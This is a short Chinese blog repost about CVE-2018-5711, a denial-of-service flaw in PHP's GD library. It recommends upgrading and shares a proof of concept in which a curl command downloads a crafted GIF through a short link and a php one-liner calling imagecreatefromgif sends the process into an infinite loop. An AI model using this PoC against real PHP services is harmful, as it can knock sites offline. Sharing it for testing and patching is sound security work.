阿里云發(fā)布的PHP高危漏洞

這肯定要修補(bǔ)啊，官方解決方案就是升級(jí)到最新版

升級(jí)過(guò)程就不說(shuō)了
編譯----安裝
期間各種BUG，很惡心

事后，覺(jué)得這漏洞還挺好，就給大家轉(zhuǎn)載下
有時(shí)間的可以自己測(cè)試下
不要搗蛋哦，小朋友們

PoC

下載搗蛋文件
$ curl -L https://git.io/vN0n4 | xxd -r > poc.gif

本機(jī)函數(shù)測(cè)試
$ php -r 'imagecreatefromgif("poc.gif");'

結(jié)果自循環(huán)，請(qǐng)使用ctrl+c
Infinite loop here...

轉(zhuǎn)載于:https://blog.51cto.com/kevinzhang91/2070078

總結(jié)

以上是生活随笔為你收集整理的CVE-2018-5711:PHP GD库拒绝服务漏洞的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。